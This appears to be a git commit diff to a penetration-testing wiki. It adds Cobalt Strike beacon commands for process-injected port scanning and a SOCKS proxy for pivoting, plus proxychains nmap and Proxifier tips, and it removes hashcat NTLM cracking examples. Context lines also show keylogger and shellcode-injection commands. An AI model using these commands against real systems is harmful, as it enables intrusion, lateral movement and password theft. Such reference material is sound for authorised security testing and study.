GitBook: [#3374] No subject
This commit is contained in:
parent
cfc7ef0b3f
commit
268d48c250
@ -49,6 +49,10 @@ screenwatch # Take periodic screenshots of desktop
|
||||
keylogger [pid] [x86|x64]
|
||||
## View > Keystrokes to see the keys pressed
|
||||
|
||||
# portscan
|
||||
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
|
||||
portscan [targets] [ports] [arp|icmp|none] [max connections]
|
||||
|
||||
# Powershell
|
||||
# Import Powershell module
|
||||
powershell-import C:\path\to\PowerView.ps1
|
||||
@ -158,4 +162,10 @@ shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x6
|
||||
|
||||
# Pass metasploit session to cobalt strike
|
||||
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
|
||||
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode</code></pre>
|
||||
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
|
||||
|
||||
|
||||
# Pivoting
|
||||
## Open a socks proxy in the teamserver
|
||||
beacon> socks 1080
|
||||
</code></pre>
|
||||
|
@ -621,21 +621,6 @@ hash-identifier
|
||||
> <HASH>
|
||||
```
|
||||
|
||||
### Wordlists
|
||||
|
||||
* **Rockyou**
|
||||
* ****[**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)****
|
||||
* ****[**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)****
|
||||
* ****[**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)****
|
||||
|
||||
### **Wordlist Generation Tools**
|
||||
|
||||
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configureable basechars, keymap and routes.
|
||||
|
||||
```bash
|
||||
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
||||
```
|
||||
|
||||
### John mutation
|
||||
|
||||
Read _**/etc/john/john.conf**_ and configure it
|
||||
@ -647,78 +632,6 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
||||
|
||||
### Hashcat
|
||||
|
||||
#### Hashcat attacks
|
||||
|
||||
* **Wordlist attack** (`-a 0`) with rules
|
||||
|
||||
**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
||||
|
||||
```
|
||||
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
||||
```
|
||||
|
||||
* **Wordlist combinator** attack
|
||||
|
||||
It's possible to **combine 2 wordlist into 1** with hashcat.\
|
||||
If the list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
|
||||
|
||||
```bash
|
||||
# This will combine 2 wordlists
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
||||
|
||||
# Same attack as before but adding chars in the newly generated words
|
||||
# In the rpevious example this will generate:
|
||||
## hello-world!
|
||||
## hello-earth!
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
||||
```
|
||||
|
||||
* **Mask attack** (`-a 3`)
|
||||
|
||||
```bash
|
||||
# Mask attack with simple mask
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
||||
|
||||
hashcat --help #will show the charsets and are as follows
|
||||
? | Charset
|
||||
===+=========
|
||||
l | abcdefghijklmnopqrstuvwxyz
|
||||
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
||||
d | 0123456789
|
||||
h | 0123456789abcdef
|
||||
H | 0123456789ABCDEF
|
||||
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
||||
a | ?l?u?d?s
|
||||
b | 0x00 - 0xff
|
||||
|
||||
# Mask attack decalring custom charset
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
||||
## -1 ?d?s defines a custom charset (digits and specials).
|
||||
## ?u?l?l?l?l?l?l?l?1 is the mask, where ?1 is the custom charset.
|
||||
|
||||
# Mask attack with variable password length
|
||||
## Create a file called masks.hcmask with this content:
|
||||
?d?s,?u?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?l?1
|
||||
## Use it to crack the password
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
||||
```
|
||||
|
||||
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
|
||||
|
||||
```bash
|
||||
# Mask numbers will be appended to each word in the wordlist
|
||||
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
||||
|
||||
# Mask numbers will be prepended to each word in the wordlist
|
||||
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
||||
```
|
||||
|
||||
#### Hashcat modes
|
||||
|
||||
```bash
|
||||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||||
```
|
||||
|
@ -23,6 +23,12 @@ _A **digital transformation** tailored to your organization is unique. It also c
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Nmap tip
|
||||
|
||||
{% hint style="warning" %}
|
||||
**ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.
|
||||
{% endhint %}
|
||||
|
||||
## **Bash**
|
||||
|
||||
**Host -> Jump -> InternalA -> InternalB** 
|
||||
@ -127,7 +133,7 @@ Local port --> Compromised host (active session) --> Third\_box:Port
|
||||
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
|
||||
```
|
||||
|
||||
### Port2hostnet (proxychains)
|
||||
### SOCKS
|
||||
|
||||
```bash
|
||||
background# meterpreter session
|
||||
@ -152,6 +158,20 @@ run #Proxy port 1080 by default
|
||||
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
|
||||
```
|
||||
|
||||
## Cobalt Strike
|
||||
|
||||
### SOCKS proxy
|
||||
|
||||
Open a port in the teamserver listening in all the interfaces that can be used to **route the traffic through the beacon**.
|
||||
|
||||
```bash
|
||||
beacon> socks 1080
|
||||
[+] started SOCKS4a server on: 1080
|
||||
|
||||
# Set port 1080 as proxy server in proxychains.conf
|
||||
proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
|
||||
```
|
||||
|
||||
## reGeorg
|
||||
|
||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||
@ -305,6 +325,12 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
|
||||
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
|
||||
```
|
||||
|
||||
## Proxify Windows GUI Apps
|
||||
|
||||
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
|
||||
In **Profile -> Proxy Servers** add the IP and port of the SOCKS server.\
|
||||
In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify.
|
||||
|
||||
## NTLM proxy bypass
|
||||
|
||||
The previously mentioned tool: **Rpivot**\
|
||||
|
Loading…
Reference in New Issue
Block a user